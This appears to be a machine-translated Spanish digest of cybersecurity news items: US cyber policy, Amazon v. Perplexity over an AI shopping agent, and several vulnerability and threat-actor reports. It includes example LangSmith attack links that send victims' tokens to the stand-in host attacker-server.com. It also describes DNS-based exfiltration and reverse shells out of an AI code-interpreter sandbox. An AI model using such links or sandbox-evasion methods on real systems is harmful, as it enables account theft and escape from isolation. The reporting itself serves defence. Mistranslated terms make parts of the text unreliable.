El gobierno de Estados Unidos no debería ceñirse rígidamente a las designaciones tradicionales sobre qué agencia toma la iniciativa en la interacción con sectores de infraestructura críticos, dijo el martes el director interino de la Agencia de Seguridad de Infraestructura y Ciberseguridad.

Las designaciones de agencias de gestión de riesgos sectoriales han determinado durante mucho tiempo qué agencia está a la vanguardia de los esfuerzos gubernamentales para proteger cada uno de los 16 sectores de infraestructura crítica, siendo CISA responsable de ocho de ellos.

«Cuando analizamos la estructura de nuestra agencia de gestión de riesgos del sector, eso es importante por muchas razones. Es menos importante cumplir con eso estrictamente y decir 'CISA es la Agencia de Gestión de Riesgos del Sector para las telecomunicaciones'», dijo Nick Andersen de CISA en un evento organizado por el Instituto McCrary de la Universidad de Auburn.

Más bien, al responder a incidentes cibernéticos o emprender otros compromisos con el sector privado, la pregunta debería ser quién tiene la mejor relación con un determinado sector.

«Es posible que tengamos algunos propietarios-operadores dentro de un determinado sector de infraestructura crítica y tal vez la persona de la que estén mejor posicionados para recibir recursos seamos nosotros, o tal vez sea [Department of] Energía, o tal vez sea la EPA, o tal vez sea el FBI o la NSA, etc., etc.», dijo. «Simplemente tenemos que sentirnos cómodos quitándonos esas anteojeras y diciendo: 'No necesariamente necesito estar a cargo todo el tiempo, sin importar quién sea'. Sólo necesito asegurarme de que este propietario-operador tenga el mejor socio preparado para liderar ese compromiso'”.

El objetivo es evitar otra “situación en Guam”, en la que “todo el mundo corría hacia Guam durante los últimos años como niños persiguiendo un balón de fútbol”, dijo Andersen. Guam fue escenario de ataques a infraestructuras críticas contra bases militares estadounidenses que Microsoft atribuyó al grupo de hackers chino Volt Typhoon en 2023.

Un ataque al sector de las telecomunicaciones por parte de otro grupo “Typhoon”, Salt Typhoon, generó dudas sobre si CISA tiene las manos demasiado ocupadas con todas sus responsabilidades como agencia de gestión de riesgos del sector. El presidente de Seguridad Nacional de la Cámara de Representantes, Andrew Garbarino, RN.Y., planteó preocupaciones el año pasado sobre cómo CISA manejó su papel de agencia de gestión de riesgos sectoriales para el sector de las telecomunicaciones después de que se descubriera la campaña del tifón de sal.

El director nacional cibernético, Sean Cairncross, dijo el martes que la administración Trump no aspira a reclutar al sector privado para realizar operaciones cibernéticas ofensivas, sino a ayudar al gobierno manteniéndolo al tanto de las amenazas que enfrenta.

La estrategia cibernética nacional recientemente publicada habla de incentivar a las empresas para que interrumpan las redes de los adversarios.

«No me refiero al sector privado, la industria o las empresas que participan en una campaña ciberofensiva», dijo Cairncross en un evento organizado por el Instituto McCrary de la Universidad de Auburn. “A lo que me refiero es a las capacidades técnicas, la capacidad de nuestro sector privado para iluminar el campo de batalla a partir de lo que están viendo, para informar y compartir información para que el gobierno de los EE.UU. [U.S. government] puedo responder para adelantarme a las cosas”.

La idea de permitir a las empresas estadounidenses emprender campañas disruptivas u ofensivas contra piratas informáticos malintencionados, o al menos ayudar en las operaciones ofensivas del gobierno estadounidense, ha vuelto a ganar fuerza en algunos círculos republicanos en los últimos años. Algunas empresas han mostrado interés en hacerlo, especialmente si se cambian las leyes para hacerlo más viable.

Esa tendencia coincide con los crecientes llamados de los funcionarios de la administración Trump (y ahora con la publicación de la estrategia de ciberseguridad) para pasar a la ofensiva contra los piratas informáticos, aunque Cairncross enfatizó nuevamente que el pilar de la estrategia para “dar forma al comportamiento del adversario” no se trata solo de llevar a cabo campañas ciberofensivas, sino de utilizar otros mecanismos gubernamentales para presionar a los piratas informáticos, ya sean legales o diplomáticos.

El gobierno puede dar forma al «cálculo de riesgo» «de una manera más ágil» con la ayuda del sector privado, dijo.

Hay una enorme capacidad por parte del sector privado, y ahora tenemos una lanza del gobierno de Estados Unidos… estamos buscando una asociación real”, dijo Cairncross.

Una forma en la que el gobierno estadounidense ha tratado de llevar la lucha a los ciberadversarios son las “operaciones conjuntas secuenciadas” del FBI, utilizadas para degradar sus capacidades. En el mismo evento, el jefe de la división cibernética de la oficina dijo que el sector privado también era clave para esas operaciones.

“Cada una de las operaciones conjuntas secuenciadas que lleva a cabo el FBI para eliminar esa capacidad de la que hablé (de los rusos, de los chinos, de los iraníes y otros) ocurre porque una víctima se presentó y se comprometió con el FBI”, dijo Brett Leatherman.

“Una conclusión para todos aquí es '¿Cuál es su plan de acción en caso de una infracción para involucrar a su oficina local del FBI?'”, preguntó. «Yo diría que hay muy poca responsabilidad al hacerlo, y estamos felices de tener conversaciones con sus abogados externos o internos, pero hay mucho que ganar al hacerlo».

Un tribunal federal de apelaciones suspendió temporalmente una orden de un juez de California que habría impedido a Perplexity AI utilizar un agente de compras impulsado por inteligencia artificial en Amazon, mientras el caso avanza en una disputa sobre quién controla la actividad automatizada dentro de las cuentas de los clientes.

El Tribunal de Apelaciones del Noveno Circuito de EE. UU. concedió el lunes a Perplexity una suspensión administrativa, suspendiendo la orden judicial mientras el tribunal considera la solicitud de la compañía de una pausa más prolongada durante su apelación. La orden del tribunal inferior debía entrar en vigor en unos días.

Amazon demandó a Perplexity en noviembre, alegando que el navegador Comet de la startup y el agente de inteligencia artificial asociado accedieron a partes protegidas con contraseña de las cuentas de los clientes de Amazon sin la autorización de Amazon, incluso cuando los usuarios permitieron que la herramienta actuara en su nombre. Amazon también acusó a Perplexity de disfrazar la actividad automatizada como navegación humana y de ignorar las repetidas demandas para que se detuviera.

La jueza de distrito estadounidense Maxine Chesney en San Francisco aceptó la solicitud de Amazon de una orden judicial preliminar el 9 de marzo. Escribió que era probable que Amazon tuviera éxito en las demandas bajo la Ley federal de abuso y fraude informático y la Ley integral de fraude y acceso a datos informáticos de California. Chesney dijo que Amazon había proporcionado pruebas sólidas de que Perplexity accedió a las cuentas «con el permiso del usuario de Amazon pero sin la autorización de Amazon».

La orden de Chesney requería que Perplexity prohibiera a Comet acceder o intentar acceder a las cuentas de usuario de Amazon y eliminar las cuentas de Amazon y los datos de los clientes que recopilaba. Chesney también citó la evidencia de Amazon sobre los costos de respuesta, incluido el tiempo de los empleados dedicado a desarrollar herramientas para bloquear Comet y detectar accesos futuros, y escribió que la compañía incurrió en una cantidad superior al umbral utilizado a menudo para respaldar las reclamaciones de fraude informático.

Perplexity argumenta que la actividad es legal porque los usuarios autorizaron al agente de IA a realizar compras y navegar por el sitio en su nombre. Al buscar una pausa, la compañía dijo que bloquear su producto en uno de los sitios de compras más grandes de Internet causaría un «daño devastador» a la empresa y a los consumidores.

Un portavoz de Perplexity dijo a CyberScoop el martes que la compañía continuaría luchando por «el derecho de las personas a elegir su propia IA». Amazon se negó a hacer comentarios.

El caso subraya los problemas con las herramientas de inteligencia artificial «agentes» que pasan de responder preguntas a iniciar transacciones. Se está pidiendo a los tribunales que comparen el permiso del usuario con la autorización de la plataforma y que decidan si los representantes automatizados deben seguir las reglas de la plataforma diseñadas para limitar los bots no divulgados en áreas sensibles de la cuenta.

Investigadores de ciberseguridad han revelado detalles de un nuevo método para extraer datos confidenciales de entornos de ejecución de código de inteligencia artificial (IA) mediante consultas del sistema de nombres de dominio (DNS).

En un informe publicado el lunes, BeyondTrust reveló que el modo sandbox de Amazon Bedrock AgentCore Code Interpreter permite consultas DNS salientes que un atacante puede aprovechar para habilitar shells interactivos y evitar el aislamiento de la red. La emisión, que no tiene un identificador CVE, tiene una puntuación CVSS de 7,5 sobre 10,0.

Intérprete de código de Amazon Bedrock AgentCore es un servicio totalmente administrado que permite a los agentes de IA ejecutar código de forma segura en entornos aislados tipo sandboxde modo que las cargas de trabajo agentes no puedan acceder a sistemas externos. Fue lanzado por Amazon en agosto de 2025.

El hecho de que el servicio permita consultas de DNS a pesar de la configuración de «sin acceso a la red» puede permitir que «los actores de amenazas establezcan canales de comando y control y exfiltración de datos a través de DNS en ciertos escenarios, evitando los controles de aislamiento de red esperados», dijo Kinnaird McQuade, arquitecto jefe de seguridad de BeyondTrust.

En un escenario de ataque experimental, un actor de amenazas puede abusar de este comportamiento para configurar un canal de comunicación bidireccional mediante consultas y respuestas de DNS, obtener un shell inverso interactivo, filtrar información confidencial a través de consultas de DNS si su función de IAM tiene permisos para acceder a recursos de AWS, como depósitos S3 que almacenan esos datos, y ejecutar comandos.

Es más, se puede abusar del mecanismo de comunicación DNS para entregar cargas útiles adicionales que se envían al intérprete de código, lo que hace que sondee el servidor de comando y control (C2) de DNS en busca de comandos almacenados en registros DNS A, los ejecute y devuelva los resultados a través de consultas de subdominio DNS.

Vale la pena señalar que Code Interpreter requiere una función de IAM para acceder a los recursos de AWS. Sin embargo, un simple descuido puede provocar que se asigne una función con privilegios excesivos al servicio, otorgándole amplios permisos para acceder a datos confidenciales.

«Esta investigación demuestra cómo la resolución DNS puede socavar las garantías de aislamiento de la red de los intérpretes de código aislados», dijo BeyondTrust. «Al utilizar este método, los atacantes podrían haber extraído datos confidenciales de los recursos de AWS accesibles a través de la función IAM del intérprete de código, lo que podría causar tiempo de inactividad, violaciones de datos de información confidencial del cliente o infraestructura eliminada».

Tras la divulgación responsable en septiembre de 2025, Amazon determinó que se trataba de una funcionalidad prevista y no de un defecto, e instó a los clientes a utilizar modo VPC en lugar del modo sandbox para un aislamiento completo de la red. El gigante tecnológico también recomienda el uso de un cortafuegos DNS para filtrar el tráfico DNS saliente.

«Para proteger las cargas de trabajo sensibles, los administradores deben inventariar todas las instancias activas de AgentCore Code Interpreter y migrar inmediatamente aquellas que manejan datos críticos del modo Sandbox al modo VPC», dijo Jason Soroko, miembro senior de Sectigo.

«Operar dentro de una VPC proporciona la infraestructura necesaria para un aislamiento sólido de la red, lo que permite a los equipos implementar grupos de seguridad estrictos, ACL de red y firewalls DNS Route53 Resolver para monitorear y bloquear la resolución DNS no autorizada. Finalmente, los equipos de seguridad deben auditar rigurosamente las funciones de IAM adjuntas a estos intérpretes, aplicando estrictamente el principio de privilegio mínimo para restringir el radio de explosión de cualquier posible compromiso».

LangSmith es susceptible a un error de adquisición de cuentas

La divulgación se produce cuando Miggo Security reveló una falla de seguridad de alta gravedad en LangSmith (CVE-2026-25750puntuación CVSS: 8,5) que exponía a los usuarios a un posible robo de tokens y apropiación de cuentas. El problema, que afecta tanto a las implementaciones autohospedadas como a las implementaciones en la nube, se solucionó en la versión 0.12.71 de LangSmith, lanzada en diciembre de 2025.

La deficiencia se ha caracterizado como un caso de inyección de parámetros de URL derivada de una falta de validación en el parámetro baseUrl, lo que permite a un atacante robar el token de portador, la ID de usuario y la ID del espacio de trabajo de un usuario que ha iniciado sesión y transmitidos a un servidor bajo su control mediante técnicas de ingeniería social, como engañar a la víctima para que haga clic en un enlace especialmente diseñado como el siguiente:

• Nube – smith.langchain[.]es/studio/?baseUrl=https://attacker-server.com
• Autohospedado – /studio/?baseUrl=https://attacker-server.com

La explotación exitosa de la vulnerabilidad podría permitir a un atacante obtener acceso no autorizado al historial de seguimiento de la IA, así como exponer consultas SQL internas, registros de clientes de CRM o código fuente propietario mediante la revisión de llamadas a herramientas.

«Un usuario de LangSmith que haya iniciado sesión podría verse comprometido simplemente accediendo a un sitio controlado por un atacante o haciendo clic en un enlace malicioso», afirman los investigadores de Miggo, Liad Eliyahu y Eliana Vuijsje. dicho.

«Esta vulnerabilidad es un recordatorio de que las plataformas de observabilidad de IA son ahora una infraestructura crítica. Como estas herramientas priorizan la flexibilidad de los desarrolladores, a menudo pasan por alto sin darse cuenta las barreras de seguridad. Este riesgo se agrava porque, al igual que el software ‘tradicional’, los agentes de IA tienen acceso profundo a fuentes de datos internas y servicios de terceros».

Defectos de deserialización de pepinillos inseguros en SGLang

También se han señalado vulnerabilidades de seguridad en SGLang, un popular marco de código abierto para servir modelos de lenguaje grandes y modelos de IA multimodal, que, si se explotan con éxito, podrían desencadenar una deserialización insegura de pickle, lo que podría resultar en la ejecución remota de código.

Las vulnerabilidades, descubiertas por el investigador de seguridad de Orca, Igor Stepansky, siguen sin parchearse al momento de escribir este artículo. Una breve descripción de las fallas es la siguiente:

• CVE-2026-3059 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticado a través del broker ZeroMQ (también conocido como ZMQ), que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticación. Afecta al módulo de generación multimodal de SGLang.
• CVE-2026-3060 (Puntuación CVSS: 9,8): una vulnerabilidad de ejecución remota de código no autenticado a través del módulo de desagregación, que deserializa datos que no son de confianza utilizando pickle.loads() sin autenticación. Afecta al sistema de desagregación paralela del codificador SGLang.
• CVE-2026-3989 (Puntuación CVSS: 7,8): el uso de una función pickle.load() insegura sin validación y deserialización adecuada en «replay_request_dump.py» de SGLang, que puede explotarse proporcionando un archivo pickle malicioso.

«Los dos primeros permiten la ejecución remota de código no autenticado contra cualquier implementación de SGLang que exponga sus características de generación o desagregación multimodal a la red», Stepansky dicho. «El tercero implica una deserialización insegura en una utilidad de reproducción de volcado de memoria».

En un aviso coordinado, el Centro de Coordinación CERT (CERT/CC) dijo que SGLang es vulnerable a CVE-2026-3059 cuando el sistema de generación multimodal está habilitado, y a CVE-2026-3060 cuando el sistema de desagregación paralela del codificador está habilitado.

«Si se cumple cualquiera de las condiciones y un atacante conoce el puerto TCP en el que el corredor ZMQ está escuchando y puede enviar solicitudes al servidor, puede explotar la vulnerabilidad enviando un archivo pickle malicioso al corredor, que luego lo deserializará», CERT/CC dicho.

Se recomienda a los usuarios de SGLang restringir el acceso a las interfaces del servicio y asegurarse de que no estén expuestos a redes que no sean de confianza. También se recomienda implementar controles de acceso y segmentación de red adecuados para evitar la interacción no autorizada con los puntos finales de ZeroMQ.

Si bien no hay evidencia de que estas vulnerabilidades hayan sido explotadas en la naturaleza, es crucial monitorear conexiones TCP entrantes inesperadas al puerto del corredor ZeroMQ, procesos secundarios inesperados generados por el proceso SGLang Python, creación de archivos en ubicaciones inusuales por el proceso SGLang y conexiones salientes del proceso SGLang a destinos inesperados.

La operación ransomware conocida como red de fugas ha adoptado la táctica de ingeniería social ClickFix entregada a través de sitios web comprometidos como método de acceso inicial.

El uso de ClickFix, donde se engaña a los usuarios para que ejecuten manualmente comandos maliciosos para solucionar errores inexistentes, es un alejamiento de la dependencia de métodos tradicionales para obtener acceso inicial, como a través de credenciales robadas adquiridas de agentes de acceso inicial (IAB), ReliaQuest. dicho en un informe técnico publicado hoy.

El segundo aspecto importante de estos ataques es el uso de un cargador de comando y control (C2) por etapas integrado en el tiempo de ejecución de JavaScript de Deno para ejecutar cargas útiles maliciosas directamente en la memoria.

«La conclusión clave aquí es que ambas rutas de entrada conducen siempre a la misma secuencia repetible posterior a la explotación», dijo la empresa de ciberseguridad. «Eso les da a los defensores algo concreto con qué trabajar: comportamientos conocidos que pueden detectar e interrumpir en cada etapa, mucho antes de la implementación del ransomware, independientemente de cómo entró LeakNet».

LeakNet surgió por primera vez en noviembre 2024, describiendo como un «vigilante digital» y enmarcando sus actividades como centradas en la libertad y la transparencia en Internet. Según datos captados por dragosel grupo también tiene dirigido entidades industriales.

El uso de ClickFix para atacar a las víctimas ofrece varias ventajas, la más importante es que reduce la dependencia de terceros proveedores, reduce el costo de adquisición por víctima y elimina el cuello de botella operativo de esperar a que cuentas valiosas lleguen al mercado.

En estos ataques, los sitios legítimos pero comprometidos se utilizan para realizar comprobaciones de verificación CAPTCHA falsas que instruyen a los usuarios a copiar y pegar un comando «msiexec.exe» en el cuadro de diálogo Ejecutar de Windows. Los ataques no se limitan a una industria vertical específica, sino que extienden una amplia red para infectar a tantas víctimas como sea posible.

El desarrollo se produce a medida que más actores de amenazas están adoptando el manual ClickFix, ya que abusa de los flujos de trabajo cotidianos y confiables para atraer a los usuarios a ejecutar comandos maliciosos a través de herramientas legítimas de Windows de una manera que parezca rutinaria y segura.

«La adopción de ClickFix por parte de LeakNet marca tanto la primera expansión documentada de la capacidad de acceso inicial del grupo como un cambio estratégico significativo», dijo ReliaQuest.

«Al alejarse de los IAB, LeakNet elimina una dependencia que naturalmente limitaba la rapidez y amplitud con la que podía operar. Y debido a que ClickFix se entrega a través de sitios web legítimos, pero comprometidos, no presenta las mismas señales obvias en la capa de red que la infraestructura propiedad del atacante».

Además del uso de ClickFix para iniciar la cadena de ataque, se evalúa que LeakNet utiliza un cargador basado en Deno para ejecutar JavaScript codificado en Base64 directamente en la memoria para minimizar la evidencia en el disco y evadir la detección. La carga útil está diseñada para tomar huellas dactilares del sistema comprometido, contactar a un servidor externo para buscar malware de la siguiente etapa y entrar en un ciclo de sondeo que busca y ejecuta repetidamente código adicional a través de Deno.

Por otra parte, ReliaQuest dijo que también observó un intento de intrusión en el que los actores de amenazas utilizaron phishing basado en Microsoft Teams para diseñar socialmente a un usuario para que lanzara una cadena de carga útil que terminaba en un cargador similar basado en Deno. Si bien la actividad permanece sin atribuir, el uso del enfoque Bring Your Own Runtime (BYOR) indica una ampliación de los vectores de acceso iniciales de LeakNet o que otros actores de amenazas han adoptado la técnica.

La actividad posterior al compromiso de LeakNet sigue una metodología consistente: comienza con el uso de carga lateral de DLL para lanzar una DLL maliciosa entregada a través del cargador, seguido del movimiento lateral usando PsExec, exfiltración de datos y cifrado.

«LeakNet ejecuta cmd.exe /c klist, un comando integrado de Windows que muestra las credenciales de autenticación activas en el sistema comprometido. Esto le dice al atacante qué cuentas y servicios ya son accesibles sin la necesidad de solicitar nuevas credenciales, para que puedan moverse más rápido y más deliberadamente», dijo ReliaQuest.

«Para la puesta en escena y la exfiltración, LeakNet utiliza depósitos S3, explotando la apariencia del tráfico normal en la nube para reducir su huella de detección».

El desarrollo se produce cuando Google reveló que Qilin (también conocido como Agenda), Akira (también conocido como RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (también conocido como FireFlame y FuryStorm) y Sinobi emergieron como las 10 principales marcas de ransomware con más víctimas reclamadas en sus sitios de fuga de datos.

«En un tercio de los incidentes, el vector de acceso inicial fue la explotación confirmada o sospechada de vulnerabilidades, con mayor frecuencia en VPN y firewalls comunes», dijo Google Threat Intelligence Group (GTIG) dichoy agregó que el 77% de las intrusiones de ransomware analizadas incluyeron sospecha de robo de datos, un aumento desde el 57% en 2024.

«A pesar de la agitación actual causada por los conflictos y la interrupción de los actores, los actores del ransomware siguen muy motivados y el ecosistema de extorsión demuestra una resiliencia continua. Varios indicadores sugieren que Sin embargo, la rentabilidad general de estas operaciones está disminuyendo, y al menos algunos actores de amenazas están alejando su cálculo de objetivos de las grandes empresas para centrarse en ataques de mayor volumen contra organizaciones más pequeñas».

La mayoría de los líderes de seguridad están luchando por defender los sistemas de inteligencia artificial con herramientas y habilidades que no son aptas para el desafío, según el Informe comparativo de pruebas adversas y de IA 2026 de Pentera.

El informe, basado en una encuesta de 300 CISO y altos líderes de seguridad de EE. UU., examina cómo las organizaciones están asegurando la infraestructura de IA y destaca brechas críticas relacionadas con la escasez de habilidades y la dependencia de controles de seguridad no diseñados para la era de la IA.

La adopción de la IA está superando la visibilidad de la seguridad

Los sistemas de IA rara vez se implementan de forma aislada. Están superpuestos e integrados en la tecnología corporativa existente, desde plataformas en la nube y sistemas de identidad hasta aplicaciones y canales de datos. Con la propiedad repartida entre equipos dispares, la supervisión centralizada eficaz ha colapsado.

Como resultado, el 67 por ciento de los CISO informaron una visibilidad limitada sobre cómo se utiliza la IA en su organización. Ninguno de los encuestados indicó que tiene visibilidad total; más bien, reconocen ser conscientes o aceptar alguna forma de uso de IA no gestionado o no autorizado.

Sin una visión clara de dónde operan los sistemas de IA o a qué recursos pueden acceder, los equipos de seguridad luchan por evaluar el riesgo de manera efectiva. Preguntas básicas, como en qué identidades se basan los sistemas de IA, a qué datos pueden acceder o cómo se comportan cuando fallan los controles, a menudo quedan sin respuesta.

Las habilidades, no el presupuesto, son la principal barrera

Aunque la seguridad de la IA es ahora un tema habitual en las salas de juntas y los debates ejecutivos, el estudio muestra que los mayores desafíos no son financieros.

Los CISO identificaron los siguientes como sus principales obstáculos para proteger la infraestructura de IA:

• Falta de experiencia interna (50 por ciento)
• Visibilidad limitada del uso de la IA (48 por ciento)
• Herramientas de seguridad insuficientes diseñadas específicamente para sistemas de inteligencia artificial (36 por ciento)

Sólo el 17 por ciento citó las restricciones presupuestarias como una preocupación principal. Esto sugiere que muchas organizaciones están dispuestas a invertir en seguridad de la IA, pero aún no cuentan con las habilidades especializadas necesarias para evaluar los riesgos relacionados con la IA en entornos reales.

Los sistemas de IA introducen comportamientos que los equipos de seguridad aún están aprendiendo a evaluar, incluida la toma de decisiones autónoma, rutas de acceso indirecto y la interacción privilegiada entre sistemas. Sin la experiencia adecuada y pruebas activas, resulta difícil evaluar si los controles existentes son efectivos según lo previsto.

Los controles heredados soportan la mayor parte de la carga

A falta de mejores prácticas, habilidades y herramientas específicas de IA, la mayoría de las empresas están ampliando los controles de seguridad existentes para cubrir la infraestructura de IA.

El estudio encontró que el 75 por ciento de los CISO dependen de controles de seguridad heredados, como herramientas de seguridad de terminales, aplicaciones, nube o API, para proteger los sistemas de inteligencia artificial. Sólo el 11 por ciento informó tener herramientas de seguridad diseñadas específicamente para proteger la infraestructura de IA.

Este enfoque refleja un patrón familiar observado durante cambios tecnológicos anteriores, donde las organizaciones inicialmente adaptan las defensas existentes antes de que surjan prácticas de seguridad más personalizadas. Si bien esto puede proporcionar una cobertura básica, es posible que los controles creados para los sistemas tradicionales no tengan en cuenta cómo la IA cambia los patrones de acceso y amplía las posibles rutas de ataque.

Un desafío familiar, ahora aplicado a la IA

En conjunto, los hallazgos muestran que los desafíos de seguridad de la IA surgen de brechas fundamentales más que de una falta de conciencia o intención.

A medida que la IA se convierte en una parte central de la infraestructura empresarial, el informe sugiere que las organizaciones deberán centrarse en desarrollar experiencia y mejorar la forma en que validan los controles de seguridad en entornos donde la IA ya está operando.

Para explorar los hallazgos completos, descargue el Informe comparativo de pruebas adversas y de IA 2026 para una discusión más profunda de los datos y conclusiones clave.

Nota: Este artículo fue escrito por Ryan Dory, director de asesores técnicos de Pentera.

Se ha observado que los actores de amenazas norcoreanos envían phishing para comprometer objetivos y obtener acceso a la aplicación de escritorio KakaoTalk de la víctima para distribuir cargas útiles maliciosas a ciertos contactos.

La actividad ha sido atribuida por la firma surcoreana de inteligencia de amenazas Genians a un grupo de hackers conocido como Konni.

«El acceso inicial se logró a través de un correo electrónico de phishing disfrazado de aviso que nombraba al destinatario como un conferenciante de derechos humanos de Corea del Norte», informó el Centro de Seguridad Genians (GSC). anotado en un análisis.

«Después de que el ataque de phishing tuvo éxito, la víctima ejecutó un archivo LNK malicioso, lo que resultó en una infección con malware de acceso remoto. El malware permaneció oculto y persistente en el terminal de la víctima durante un período prolongado, robando documentos internos e información confidencial».

Se dice que el actor de amenazas permaneció en el host comprometido durante un período prolongado de tiempo, aprovechando el acceso no autorizado para desviar documentos internos y utilizar la aplicación KakaoTalk para propagar selectivamente el malware a contactos específicos.

El ataque se caracteriza por abusar de la confianza asociada con las víctimas comprometidas para engañar y atrapar objetivos adicionales. Esta no es la primera vez que Konni emplea la aplicación de mensajería como vector de distribución. En noviembre de 2025, se descubrió que el grupo de piratas informáticos abusaba de las sesiones iniciadas en la aplicación de chat KakaoTalk para enviar cargas útiles maliciosas a los contactos de las víctimas en forma de un archivo ZIP, al mismo tiempo que iniciaba un borrado remoto de sus dispositivos Android utilizando credenciales de Google robadas.

El punto de partida de la última campaña de ataque es un correo electrónico de phishing que se utiliza como estrategia para engañar a los destinatarios para que abran un archivo ZIP adjunto que contiene un acceso directo de Windows (LNK). Tras la ejecución, el archivo LNK descarga una carga útil de la siguiente etapa desde un servidor externo, establece persistencia mediante tareas programadas y, en última instancia, ejecuta el malware, mientras muestra un documento PDF señuelo al usuario como mecanismo de distracción.

Escrito en AutoIt, el malware descargado es un troyano de acceso remoto (RAT) llamado EndRAT (también conocido como EndClient RAT), que permite al operador controlar remotamente el host comprometido a través de capacidades como administración de archivos, acceso remoto al shell, transferencia de datos y persistencia.

Un análisis más detallado del host infectado ha descubierto la presencia de varios artefactos maliciosos, incluidos scripts AutoIt correspondientes a RftRAT y RemcosRAT, lo que indica que el adversario consideró que la víctima era lo suficientemente valiosa como para eliminar varias familias de RAT para mejorar la resistencia.

Un aspecto importante del ataque es el abuso por parte del actor de amenazas de la aplicación KakaoTalk de la víctima instalada en el sistema infectado para distribuir archivos maliciosos en forma de archivos ZIP a otras personas en su lista de contactos e implementar el mismo malware. Básicamente, esto convierte a las víctimas existentes en intermediarios para futuros ataques.

«Esta campaña se evalúa como una operación de ataque de múltiples etapas que se extiende más allá del simple phishing, combinando persistencia a largo plazo, robo de información y redistribución basada en cuentas», dijo Genians. «El actor seleccionó ciertos contactos de la lista de amigos de la víctima y les envió archivos maliciosos adicionales. Al hacerlo, el atacante usó nombres de archivos disfrazados de materiales que presentaban contenido relacionado con Corea del Norte para inducir a los destinatarios a abrir los archivos».

Después de décadas de desarrollo, la computación cuántica está cada vez más disponible para uso científico y comercial avanzado. Las maravillas potenciales van desde acelerar el descubrimiento de fármacos y la ciencia de materiales hasta optimizar la logística compleja y los modelos financieros.

Pero hay una paradoja en esta tendencia: la computación cuántica también representa una amenaza creciente para la seguridad de los datos.

El riesgo es que los algoritmos y protocolos que se utilizan actualmente para proteger dispositivos, aplicaciones y sistemas informáticos puedan eventualmente ser violados por actores maliciosos que utilicen la computación cuántica, comprometiendo incluso las medidas de seguridad más estrictas. Según algunas estimaciones, los estándares de cifrado ampliamente utilizados, como RSA y ECC, podrían ser descifrados por computadoras cuánticas ya en 2029, un día apocalíptico conocido como “Q-Day”, cuando los estándares de seguridad actuales quedarían ineficaces debido a la destreza de cálculo numérico de la computación cuántica.

La posibilidad de que la computación cuántica pueda romper los protocolos de protección de datos actuales está llevando a los directores de seguridad y de tecnología a intensificar las contramedidas. Lo están haciendo con la criptografía poscuántica (PQC), un área de nicho de la ciberseguridad cuya prioridad está aumentando en todo el mundo empresarial. La falta de preparación podría resultar costosa, con un informe situando el costo económico potencial de un ataque cuántico en Estados Unidos en más de 3 billones de dólares. Incluso antes de esa posible calamidad, el costo promedio actual de una violación de datos es superior a $10 millonesy ese número sólo aumentará proporcionalmente a la escala de una brecha inducida por cuántica.

Por eso la amenaza cuántica no debería ser tratada como una preocupación exclusiva de los ejecutivos con visión de futuro. Debe convertirse en una cuestión a nivel de las juntas directivas de todas las empresas. Las organizaciones deberían lanzar una iniciativa integral de PQC que genere conciencia en toda la empresa y actualice los sistemas digitales y los activos de datos para que sean resistentes a los ataques cuánticos.

Esperar hasta el Día Q sería un error porque la gente no sabrá cuándo ocurrirá. Probablemente no llegará con comunicados de prensa ni anuncios de productos. En cambio, esto puede desarrollarse silenciosamente a medida que los atacantes intentan maximizar lo que pueden robar antes de que alguien se dé cuenta. La realidad es que los datos confidenciales ya corren el riesgo de ser robados y almacenados para poder decodificarlos (un ataque denominado “cosechar ahora, descifrar después”) cuando el Q-Day sea una realidad. Los profesionales de la seguridad deben prestar atención inmediata a esta cuestión, incluso si la amenaza definitiva parece estar dentro de unos años.

Datos de prueba cuántica a escala

Los equipos de seguridad suelen centrarse en las amenazas inmediatas, pero todavía tienen una ventana de oportunidad para prepararse para el Q-Day, siempre que empiecen ahora.

Una medida provisional en marcha es la transición a versiones más robustas de los certificados y claves digitales que ya son omnipresentes en los negocios y la vida cotidiana. Estos certificados, que actúan como credenciales de identidad, se utilizan para autenticar miles de millones de usuarios, dispositivos, documentos y otras formas de comunicaciones y puntos finales. Los certificados contienen claves criptográficas. Los equipos de seguridad están introduciendo gradualmente “claves de 47 días”, que están diseñadas para caducar y ser reemplazadas en 47 días, con mucha más frecuencia que la generación actual. Es un paso en la dirección correcta, pero no suficiente.

Establecer una defensa PQC reforzada requiere mucho más que un parche de software estándar o una actualización de la infraestructura de clave pública (PKI) utilizada en la mayoría de los lugares para administrar certificados digitales y cifrar datos. Se debe adoptar e implementar a escala una estrategia de PQC para toda la empresa.

Consideremos el rápido aumento de la IA agente, donde las organizaciones pueden necesitar asignar identidades digitales a miles o incluso millones de agentes de IA. Eso requerirá un nivel de autenticación que vaya mucho más allá de la infraestructura existente.

Estos proyectos serán dirigidos por el CISO, pero la planificación y ejecución deben incluir a otros líderes empresariales porque la seguridad poscuántica debe llegar a todas las partes del entorno digital de la organización. Las juntas directivas también deben participar, dados los riesgos de gobernanza y la importante inversión de capital requerida.

Desarrollar una estrategia plurianual y multifacética

Las organizaciones de industrias reguladas (banca, atención médica y gobierno, por ejemplo) generalmente están un paso adelante en la preparación para la amenaza poscuántica. Sin embargo, independientemente de la industria, pocos están completamente preparados porque la preparación requiere una imagen detallada del panorama de seguridad y datos de extremo a extremo de una organización.

En mi experiencia, esa visión holística es una rareza. Para los CISO y sus colegas de línea de negocio, un buen punto de partida es crear un inventario completo de sistemas y datos en toda la empresa y luego priorizar lo que se debe proteger.

Otro paso importante es comenzar a probar y adoptar los últimos algoritmos y protocolos resistentes a los cuánticos que han sido estandarizados por el NIST. Una gama cada vez mayor de productos y plataformas PKI admiten esas especificaciones. Esto es esencial porque la única forma en que las empresas podrán orquestar, monitorear y gestionar el alcance de la implementación es a través de la automatización.

Estas actualizaciones son vitales, pero no se trata simplemente de reemplazar las especificaciones precuánticas por otras más nuevas. Debido a que PQC será una tarea de varios años, las organizaciones deben cerrar la brecha entre lo antiguo y lo nuevo. La mejor estrategia para algunos será un enfoque híbrido que combine la criptografía clásica y los algoritmos de próxima generación, aunque la estandarización sigue siendo un trabajo en progreso. Otras organizaciones están avanzando hacia un modelo poscuántico “puro” o no combinado.

En cuanto a esos ataques de recolección, la mejor defensa es sencilla: cifrar sus datos más confidenciales y de larga duración con algoritmos resistentes a los cuánticos lo antes posible.

PQC es una responsabilidad compartida

Desafortunadamente, no hay una línea de meta en la carrera hacia la seguridad de la era cuántica. E incluso si una organización bloquea sus sistemas contra amenazas emergentes, no hay garantía de que los clientes y socios comerciales hagan lo mismo.

